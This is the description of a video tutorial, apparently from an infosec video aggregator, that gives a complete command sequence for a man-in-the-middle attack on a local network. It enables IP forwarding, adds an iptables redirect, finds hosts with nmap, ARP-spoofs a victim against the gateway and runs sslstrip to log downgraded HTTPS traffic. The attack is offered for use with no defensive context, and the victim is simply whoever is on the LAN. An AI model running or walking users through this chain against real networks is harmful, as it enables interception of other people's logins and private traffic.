Description: Preforming MITM Attacks Using Kali Linux and SSLStrip
Set up port-forwarding on your Linux box:
echo '1' > /proc/sys/net/ipv4/ip_forward
we need to set up a firewall rule via iptables to redirect requests from port 80 to port 8080 -- this will ensure that our outgoing connections from SSL Strip get routed to the proper port.
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 8080
Find out which system on your network is the gateway
netstat -nr
This will inform you about which IP belongs to the gateway. Usually it's something like 192.168.1.1.
Next we need to do a nmap scan to find machines on the network that are up open a Terminal and run the following command:
nmap [IP You got from netstat -nr]/24
without the []'s and ending with a /24 press enter look thru the list of machines that are Up and take note of the that IP
Use ARP Spoof to put yourself between the router and all other systems on the network.
arpspoof -i eth0 -t 192.168.1.2 -r 192.168.1.1
or
arpspoof -i wlan0 -t 192.168.1.2 -r 192.168.1.1
Remember to change the 192.168.1.2 to whatever the victims LAN IP is change 192.168.1.1 to whatever the routers gateway is.
Once arpspoof starts running, open a new terminal and start SSL Strip.
sslstrip -l 8080
You can check the logs by typing into a new Terminal and or going to Places and then Home Folder
cat sslstrip.log
or
tail -f sslstrip.log
Be sure to check out:
http://matthewhknight.com
http://facebook.com/ZaraByte
http://twitter.com/ZaraByte
Tags:
Disclaimer: We are a infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be same without verifying.